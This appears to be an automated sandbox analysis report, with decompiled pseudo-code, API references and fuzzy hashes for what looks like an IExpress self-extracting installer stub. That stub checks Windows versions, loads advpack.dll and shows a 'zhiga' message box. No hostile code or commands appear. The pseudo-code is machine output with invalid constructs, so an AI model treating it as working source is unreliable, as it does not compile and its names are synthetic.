                                                          
                                                          				_t20 = __ebx;
                                                          				_t7 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t7 ^ _t27;
                                                          				_t25 = 0x104;
                                                          				_t26 = 0;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					E010C658A( &_v268, 0x104, "wininit.ini");
                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                          					_t25 = _lopen( &_v268, 0x40);
                                                          					if(_t25 != 0xffffffff) {
                                                          						_t26 = _llseek(_t25, 0, 2);
                                                          						_lclose(_t25);
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                          			}











                                                          0x010c24e0
                                                          0x010c24eb
                                                          0x010c24f2
                                                          0x010c24f7
                                                          0x010c2504
                                                          0x010c250e
                                                          0x010c251d
                                                          0x010c252c
                                                          0x010c2541
                                                          0x010c2546
                                                          0x010c2553
                                                          0x010c2555
                                                          0x010c2555
                                                          0x010c2546
                                                          0x010c256c

                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010C2506
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010C252C
                                                          • _lopen.KERNEL32(?,00000040), ref: 010C253B
                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010C254C
                                                          • _lclose.KERNEL32(00000000), ref: 010C2555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          • Opcode ID: a6f7dd1c555538400af253b0db41396ff6613888a1520230ccc2f9a1ead0a835
                                                          • Instruction ID: dd104f049b36e37ecf9be7871733e683553f692811dc605e673ec512e80e16e9
                                                          • Opcode Fuzzy Hash: a6f7dd1c555538400af253b0db41396ff6613888a1520230ccc2f9a1ead0a835
                                                          • Instruction Fuzzy Hash: A701B931B00118ABD7309B659C0CEDF7B7CDB55750F100159FA85D3184DA798A41CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010C36EE(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _OSVERSIONINFOA _v416;
                                                          				signed int _v420;
                                                          				signed int _v424;
                                                          				CHAR* _v428;
                                                          				CHAR* _v432;
                                                          				signed int _v436;
                                                          				CHAR* _v440;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t72;
                                                          				CHAR* _t77;
                                                          				CHAR* _t91;
                                                          				CHAR* _t94;
                                                          				int _t97;
                                                          				CHAR* _t98;
                                                          				signed char _t99;
                                                          				CHAR* _t104;
                                                          				signed short _t107;
                                                          				signed int _t109;
                                                          				short _t113;
                                                          				void* _t114;
                                                          				signed char _t115;
                                                          				short _t119;
                                                          				CHAR* _t123;
                                                          				CHAR* _t124;
                                                          				CHAR* _t129;
                                                          				signed int _t131;
                                                          				signed int _t132;
                                                          				CHAR* _t135;
                                                          				CHAR* _t138;
                                                          				signed int _t139;
                                                          
                                                          				_t72 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t72 ^ _t139;
                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                          				_t115 = __ecx;
                                                          				_t135 = 0;
                                                          				_v432 = __ecx;
                                                          				_t138 = 0;
                                                          				if(GetVersionExA( &_v416) != 0) {
                                                          					_t133 = _v416.dwMajorVersion;
                                                          					_t119 = 2;
                                                          					_t77 = _v416.dwPlatformId - 1;
                                                          					__eflags = _t77;
                                                          					if(_t77 == 0) {
                                                          						_t119 = 0;
                                                          						__eflags = 1;
                                                          						 *0x10c8184 = 1;
                                                          						 *0x10c8180 = 1;
                                                          						L13:
                                                          						 *0x10c9a40 = _t119;
                                                          						L14:
                                                          						__eflags =  *0x10c8a34 - _t138; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L66;
                                                          						}
                                                          						__eflags = _t115;
                                                          						if(_t115 == 0) {
                                                          							goto L66;
                                                          						}
                                                          						_v428 = _t135;
                                                          						__eflags = _t119;
                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                          						_t11 =  &_v420;
                                                          						 *_t11 = _v420 & _t138;
                                                          						__eflags =  *_t11;
                                                          						_v440 = _t115;
                                                          						do {
                                                          							_v424 = _t135 * 0x18;
                                                          							_v436 = E010C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                          							_t91 = E010C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                          							_t123 = _v436;
                                                          							_t133 = 0x54d;
                                                          							__eflags = _t123;
                                                          							if(_t123 < 0) {
                                                          								L32:
                                                          								__eflags = _v420 - 1;
                                                          								if(_v420 == 1) {
                                                          									_t138 = 0x54c;
                                                          									L36:
                                                          									__eflags = _t138;
                                                          									if(_t138 != 0) {
                                                          										L40:
                                                          										__eflags = _t138 - _t133;
                                                          										if(_t138 == _t133) {
                                                          											L30:
                                                          											_v420 = _v420 & 0x00000000;
                                                          											_t115 = 0;
                                                          											_v436 = _v436 & 0x00000000;
                                                          											__eflags = _t138 - _t133;
                                                          											_t133 = _v432;
                                                          											if(__eflags != 0) {
                                                          												_t124 = _v440;
                                                          											} else {
                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                          												_v420 =  &_v268;
                                                          											}
                                                          											__eflags = _t124;
                                                          											if(_t124 == 0) {
                                                          												_t135 = _v436;
                                                          											} else {
                                                          												_t99 = _t124[0x30];
                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                          												__eflags = _t99 & 0x00000001;
                                                          												if((_t99 & 0x00000001) == 0) {
                                                          													asm("sbb ebx, ebx");
                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                          												} else {
                                                          													_t115 = 0x104;
                                                          												}
                                                          											}
                                                          											__eflags =  *0x10c8a38 & 0x00000001;
                                                          											if(( *0x10c8a38 & 0x00000001) != 0) {
                                                          												L64:
                                                          												_push(0);
                                                          												_push(0x30);
                                                          												_push(_v420);
                                                          												_push("zhiga");
                                                          												goto L65;
                                                          											} else {
                                                          												__eflags = _t135;
                                                          												if(_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												__eflags =  *_t135;
                                                          												if( *_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												MessageBeep(0);
                                                          												_t94 = E010C681F(_t115);
                                                          												__eflags = _t94;
                                                          												if(_t94 == 0) {
                                                          													L57:
                                                          													0x180030 = 0x30;
                                                          													L58:
                                                          													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                          													__eflags = _t115 & 0x00000004;
                                                          													if((_t115 & 0x00000004) == 0) {
                                                          														__eflags = _t115 & 0x00000001;
                                                          														if((_t115 & 0x00000001) == 0) {
                                                          															goto L66;
                                                          														}
                                                          														__eflags = _t97 - 1;
                                                          														L62:
                                                          														if(__eflags == 0) {
                                                          															_t138 = 0;
                                                          														}
                                                          														goto L66;
                                                          													}
                                                          													__eflags = _t97 - 6;
                                                          													goto L62;
                                                          												}
                                                          												_t98 = E010C67C9(_t124, _t124);
                                                          												__eflags = _t98;
                                                          												if(_t98 == 0) {
                                                          													goto L57;
                                                          												}
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags = _t138 - 0x54c;
                                                          										if(_t138 == 0x54c) {
                                                          											goto L30;
                                                          										}
                                                          										__eflags = _t138;
                                                          										if(_t138 == 0) {
                                                          											goto L66;
                                                          										}
                                                          										_t135 = 0;
                                                          										__eflags = 0;
                                                          										goto L44;
                                                          									}
                                                          									L37:
                                                          									_t129 = _v432;
                                                          									__eflags = _t129[0x7c];
                                                          									if(_t129[0x7c] == 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t133 =  &_v268;
                                                          									_t104 = E010C28E8(_t129,  &_v268, _t129,  &_v428);
                                                          									__eflags = _t104;
                                                          									if(_t104 != 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t135 = _v428;
                                                          									_t133 = 0x54d;
                                                          									_t138 = 0x54d;
                                                          									goto L40;
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							__eflags = _t91;
                                                          							if(_t91 > 0) {
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _t123;
                                                          							if(_t123 != 0) {
                                                          								__eflags = _t91;
                                                          								if(_t91 != 0) {
                                                          									goto L37;
                                                          								}
                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                          								L27:
                                                          								if(__eflags <= 0) {
                                                          									goto L37;
                                                          								}
                                                          								L28:
                                                          								__eflags = _t135;
                                                          								if(_t135 == 0) {
                                                          									goto L33;
                                                          								}
                                                          								_t138 = 0x54c;
                                                          								goto L30;
                                                          							}
                                                          							__eflags = _t91;
                                                          							_t107 = _v416.dwBuildNumber;
                                                          							if(_t91 != 0) {
                                                          								_t131 = _v424;
                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                          									goto L37;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t132 = _t107 & 0x0000ffff;
                                                          							_t109 = _v424;
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                          								goto L28;
                                                          							}
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                          							goto L27;
                                                          							L33:
                                                          							_t135 =  &(_t135[1]);
                                                          							_v428 = _t135;
                                                          							_v420 = _t135;
                                                          							__eflags = _t135 - 2;
                                                          						} while (_t135 < 2);
                                                          						goto L36;
                                                          					}
                                                          					__eflags = _t77 == 1;
                                                          					if(_t77 == 1) {
                                                          						 *0x10c9a40 = _t119;
                                                          						 *0x10c8184 = 1;
                                                          						 *0x10c8180 = 1;
                                                          						__eflags = _t133 - 3;
                                                          						if(_t133 > 3) {
                                                          							__eflags = _t133 - 5;
                                                          							if(_t133 < 5) {
                                                          								goto L14;
                                                          							}
                                                          							_t113 = 3;
                                                          							_t119 = _t113;
                                                          							goto L13;
                                                          						}
                                                          						_t119 = 1;
                                                          						_t114 = 3;
                                                          						 *0x10c9a40 = 1;
                                                          						__eflags = _t133 - _t114;
                                                          						if(__eflags < 0) {
                                                          							L9:
                                                          							 *0x10c8184 = _t135;
                                                          							 *0x10c8180 = _t135;
                                                          							goto L14;
                                                          						}
                                                          						if(__eflags != 0) {
                                                          							goto L14;
                                                          						}
                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					_t138 = 0x4ca;
                                                          					goto L44;
                                                          				} else {
                                                          					_t138 = 0x4b4;
                                                          					L44:
                                                          					_push(_t135);
                                                          					_push(0x10);
                                                          					_push(_t135);
                                                          					_push(_t135);
                                                          					L65:
                                                          					_t133 = _t138;
                                                          					E010C44B9(0, _t138);
                                                          					L66:
                                                          					return E010C6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                          				}
                                                          			}





































                                                          0x010c36f9
                                                          0x010c3700
                                                          0x010c370c
                                                          0x010c3716
                                                          0x010c3718
                                                          0x010c371b
                                                          0x010c3721
                                                          0x010c372b
                                                          0x010c373d
                                                          0x010c3745
                                                          0x010c3746
                                                          0x010c3746
                                                          0x010c3749
                                                          0x010c37ab
                                                          0x010c37ad
                                                          0x010c37ae
                                                          0x010c37b3
                                                          0x010c37b8
                                                          0x010c37b8
                                                          0x010c37bf
                                                          0x010c37bf
                                                          0x010c37c5
                                                          0x00000000
                                                          0x00000000
                                                          0x010c37cb
                                                          0x010c37cd
                                                          0x00000000
                                                          0x00000000
                                                          0x010c37d5
                                                          0x010c37db
                                                          0x010c37e8
                                                          0x010c37ea
                                                          0x010c37ea
                                                          0x010c37ea
                                                          0x010c37f0
                                                          0x010c37f6
                                                          0x010c3805
                                                          0x010c3817
                                                          0x010c382b
                                                          0x010c3830
                                                          0x010c3836
                                                          0x010c383b
                                                          0x010c383d
                                                          0x010c38eb
                                                          0x010c38eb
                                                          0x010c38f2
                                                          0x010c390c
                                                          0x010c3911
                                                          0x010c3911
                                                          0x010c3913
                                                          0x010c394d
                                                          0x010c394d
                                                          0x010c394f
                                                          0x010c38a9
                                                          0x010c38a9
                                                          0x010c38b0
                                                          0x010c38b2
                                                          0x010c38b9
                                                          0x010c38bb
                                                          0x010c38c1
                                                          0x010c3975
                                                          0x010c38c7
                                                          0x010c38de
                                                          0x010c38e0
                                                          0x010c38e0
                                                          0x010c397b
                                                          0x010c397d
                                                          0x010c39a9
                                                          0x010c397f
                                                          0x010c3982
                                                          0x010c398b
                                                          0x010c398d
                                                          0x010c398f
                                                          0x010c399f
                                                          0x010c39a1
                                                          0x010c3991
                                                          0x010c3991
                                                          0x010c3991
                                                          0x010c398f
                                                          0x010c39af
                                                          0x010c39b6
                                                          0x010c3a0f
                                                          0x010c3a0f
                                                          0x010c3a11
                                                          0x010c3a13
                                                          0x010c3a19
                                                          0x00000000
                                                          0x010c39b8
                                                          0x010c39b8
                                                          0x010c39ba
                                                          0x00000000
                                                          0x00000000
                                                          0x010c39bc
                                                          0x010c39bf
                                                          0x00000000
                                                          0x00000000
                                                          0x010c39c3
                                                          0x010c39c9
                                                          0x010c39ce
                                                          0x010c39d0
                                                          0x010c39e3
                                                          0x010c39e5
                                                          0x010c39e6
                                                          0x010c39f1
                                                          0x010c39f7
                                                          0x010c39fa
                                                          0x010c3a01
                                                          0x010c3a04
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3a06
                                                          0x010c3a09
                                                          0x010c3a09
                                                          0x010c3a0b
                                                          0x010c3a0b
                                                          0x00000000
                                                          0x010c3a09
                                                          0x010c39fc
                                                          0x00000000
                                                          0x010c39fc
                                                          0x010c39d3
                                                          0x010c39d8
                                                          0x010c39da
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c39dc
                                                          0x010c39b6
                                                          0x010c3955
                                                          0x010c395b
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3961
                                                          0x010c3963
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3969
                                                          0x010c3969
                                                          0x00000000
                                                          0x010c3969
                                                          0x010c3915
                                                          0x010c3915
                                                          0x010c391b
                                                          0x010c391f
                                                          0x00000000
                                                          0x00000000
                                                          0x010c392d
                                                          0x010c3933
                                                          0x010c3938
                                                          0x010c393a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3940
                                                          0x010c3946
                                                          0x010c394b
                                                          0x00000000
                                                          0x010c394b
                                                          0x00000000
                                                          0x010c38f2
                                                          0x010c3843
                                                          0x010c3845
                                                          0x00000000
                                                          0x00000000
                                                          0x010c384b
                                                          0x010c384d
                                                          0x010c3883
                                                          0x010c3885
                                                          0x00000000
                                                          0x00000000
                                                          0x010c389a
                                                          0x010c389e
                                                          0x010c389e
                                                          0x00000000
                                                          0x00000000
                                                          0x010c38a0
                                                          0x010c38a0
                                                          0x010c38a2
                                                          0x00000000
                                                          0x00000000
                                                          0x010c38a4
                                                          0x00000000
                                                          0x010c38a4
                                                          0x010c384f
                                                          0x010c3851
                                                          0x010c3857
                                                          0x010c386e
                                                          0x010c3877
                                                          0x010c387b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3881
                                                          0x010c3859
                                                          0x010c385c
                                                          0x010c3862
                                                          0x010c3866
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3868
                                                          0x00000000
                                                          0x010c38f4
                                                          0x010c38f4
                                                          0x010c38f5
                                                          0x010c38fb
                                                          0x010c3901
                                                          0x010c3901
                                                          0x00000000
                                                          0x010c390a
                                                          0x010c374b
                                                          0x010c374e
                                                          0x010c375c
                                                          0x010c3764
                                                          0x010c3769
                                                          0x010c376e
                                                          0x010c3771
                                                          0x010c379c
                                                          0x010c379f
                                                          0x00000000
                                                          0x00000000
                                                          0x010c37a3
                                                          0x010c37a4
                                                          0x00000000
                                                          0x010c37a4
                                                          0x010c3773
                                                          0x010c3777
                                                          0x010c3778
                                                          0x010c377f
                                                          0x010c3781
                                                          0x010c378e
                                                          0x010c378e
                                                          0x010c3794
                                                          0x00000000
                                                          0x010c3794
                                                          0x010c3783
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3785
                                                          0x010c378c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c378c
                                                          0x010c3750
                                                          0x00000000
                                                          0x010c372d
                                                          0x010c372d
                                                          0x010c396b
                                                          0x010c396b
                                                          0x010c396c
                                                          0x010c396e
                                                          0x010c396f
                                                          0x010c3a1e
                                                          0x010c3a1e
                                                          0x010c3a22
                                                          0x010c3a27
                                                          0x010c3a3e
                                                          0x010c3a3e

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010C3723
                                                          • MessageBeep.USER32(00000000), ref: 010C39C3
                                                          • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 010C39F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Message$BeepVersion
                                                          • String ID: 3$zhiga
                                                          • API String ID: 2519184315-2183486482
                                                          • Opcode ID: 05fb130d9572896257e65e97236a30acac1ab042916923c061471cc3d0229601
                                                          • Instruction ID: a5317139c453a682901e51776ec296d28f4afefbdfde0006dce0a10c4d38c7f8
                                                          • Opcode Fuzzy Hash: 05fb130d9572896257e65e97236a30acac1ab042916923c061471cc3d0229601
                                                          • Instruction Fuzzy Hash: 0191C271E212259FEBB58B19C9807EEB7E0FB85B04F0581EDD9CA9F281D73589808F41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E010C6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				signed int _t9;
                                                          				signed char _t14;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t18;
                                                          				CHAR* _t26;
                                                          				void* _t27;
                                                          				signed int _t28;
                                                          
                                                          				_t27 = __esi;
                                                          				_t18 = __ebx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t28;
                                                          				_push(__ecx);
                                                          				E010C1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          				_t26 = "advpack.dll";
                                                          				E010C658A( &_v268, 0x104, _t26);
                                                          				_t14 = GetFileAttributesA( &_v268);
                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                          					_t15 = LoadLibraryA(_t26);
                                                          				} else {
                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                          				}
                                                          				return E010C6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                          			}













                                                          0x010c6495
                                                          0x010c6495
                                                          0x010c64a0
                                                          0x010c64a7
                                                          0x010c64ab
                                                          0x010c64bd
                                                          0x010c64c2
                                                          0x010c64d3
                                                          0x010c64df
                                                          0x010c64e8
                                                          0x010c6502
                                                          0x010c64ee
                                                          0x010c64f9
                                                          0x010c64f9
                                                          0x010c6516

                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C64DF
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C64F9
                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C6502
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                          • API String ID: 438848745-2381869747
                                                          • Opcode ID: c7eaee630fed5456735f18ac10031666d0dd745f86175a25c70e623f9ebd6cfe
                                                          • Instruction ID: b324ee28ebb416e9515ee1f6581a79a3ab46061cae8f2e077cfe5d0155788814
                                                          • Opcode Fuzzy Hash: c7eaee630fed5456735f18ac10031666d0dd745f86175a25c70e623f9ebd6cfe
                                                          • Instruction Fuzzy Hash: BA01A230A001089FD7709B64D849AEE7778EBA4B10F60019DB9C5932C4DF76AA858F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                          				void* _v8;
                                                          				char* _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				void* _v36;
                                                          				int _v40;
                                                          				void* _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				long _t68;
                                                          				void* _t70;
                                                          				void* _t73;
                                                          				void* _t79;
                                                          				void* _t83;
                                                          				void* _t87;
                                                          				void* _t88;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t97;
                                                          				intOrPtr _t99;
                                                          				int _t101;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t109;
                                                          				void* _t110;
                                                          
                                                          				_v12 = __edx;
                                                          				_t99 = __ecx;
                                                          				_t106 = 0;
                                                          				_v16 = __ecx;
                                                          				_t87 = 0;
                                                          				_t103 = 0;
                                                          				_v20 = 0;
                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                          					L19:
                                                          					_t106 = 1;
                                                          				} else {
                                                          					_t62 = 0;
                                                          					_v8 = 0;
                                                          					while(1) {
                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                          						if(E010C2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                          							goto L20;
                                                          						}
                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                          						_v28 = _t68;
                                                          						if(_t68 == 0) {
                                                          							_t99 = _v16;
                                                          							_t70 = _v8 + _t99;
                                                          							_t93 = _v24;
                                                          							_t87 = _v20;
                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                          								goto L18;
                                                          							}
                                                          						} else {
                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                          							if(_t103 != 0) {
                                                          								_t73 = GlobalLock(_t103);
                                                          								_v36 = _t73;
                                                          								if(_t73 != 0) {
                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                          										L15:
                                                          										GlobalUnlock(_t103);
                                                          										_t99 = _v16;
                                                          										L18:
                                                          										_t87 = _t87 + 1;
                                                          										_t62 = _v8 + 0x3c;
                                                          										_v20 = _t87;
                                                          										_v8 = _v8 + 0x3c;
                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                          											continue;
                                                          										} else {
                                                          											goto L19;
                                                          										}
                                                          									} else {
                                                          										_t79 = _v44;
                                                          										_t88 = _t106;
                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                          										_t101 = _v28;
                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                          										_t97 = _v48;
                                                          										_v36 = _t83;
                                                          										_t109 = _t83;
                                                          										do {
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                          											_t109 = _t109 + 0x18;
                                                          											_t88 = _t88 + 4;
                                                          										} while (_t88 < 8);
                                                          										_t87 = _v20;
                                                          										_t106 = 0;
                                                          										if(_v56 < 0 || _v64 > 0) {
                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                          												GlobalUnlock(_t103);
                                                          											} else {
                                                          												goto L15;
                                                          											}
                                                          										} else {
                                                          											goto L15;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				L20:
                                                          				 *_a8 = _t87;
                                                          				if(_t103 != 0) {
                                                          					GlobalFree(_t103);
                                                          				}
                                                          				return _t106;
                                                          			}

































                                                          0x010c28f1
                                                          0x010c28f4
                                                          0x010c28f7
                                                          0x010c28f9
                                                          0x010c28fc
                                                          0x010c28ff
                                                          0x010c2901
                                                          0x010c2907
                                                          0x010c2a62
                                                          0x010c2a64
                                                          0x010c290d
                                                          0x010c290d
                                                          0x010c290f
                                                          0x010c2912
                                                          0x010c2920
                                                          0x010c2937
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2944
                                                          0x010c294a
                                                          0x010c294f
                                                          0x010c2a2f
                                                          0x010c2a32
                                                          0x010c2a34
                                                          0x010c2a37
                                                          0x010c2a41
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2955
                                                          0x010c295e
                                                          0x010c2962
                                                          0x010c2969
                                                          0x010c296f
                                                          0x010c2974
                                                          0x010c298c
                                                          0x010c2a20
                                                          0x010c2a21
                                                          0x010c2a27
                                                          0x010c2a4c
                                                          0x010c2a4f
                                                          0x010c2a50
                                                          0x010c2a53
                                                          0x010c2a56
                                                          0x010c2a5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c29b2
                                                          0x010c29b2
                                                          0x010c29b5
                                                          0x010c29bd
                                                          0x010c29c3
                                                          0x010c29cc
                                                          0x010c29d5
                                                          0x010c29d7
                                                          0x010c29da
                                                          0x010c29dd
                                                          0x010c29df
                                                          0x010c29ec
                                                          0x010c29f8
                                                          0x010c29fc
                                                          0x010c29ff
                                                          0x010c2a02
                                                          0x010c2a07
                                                          0x010c2a0a
                                                          0x010c2a0f
                                                          0x010c2a19
                                                          0x010c2a81
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2a0f
                                                          0x010c298c
                                                          0x010c2974
                                                          0x010c2962
                                                          0x00000000
                                                          0x010c294f
                                                          0x010c2912
                                                          0x010c2a65
                                                          0x010c2a68
                                                          0x010c2a6c
                                                          0x010c2a6f
                                                          0x010c2a6f
                                                          0x010c2a7d

                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 010C2A6F
                                                            • Part of subcall function 010C2773: CharUpperA.USER32(4B13CF70,00000000,00000000,00000000), ref: 010C27A8
                                                            • Part of subcall function 010C2773: CharNextA.USER32(0000054D), ref: 010C27B5
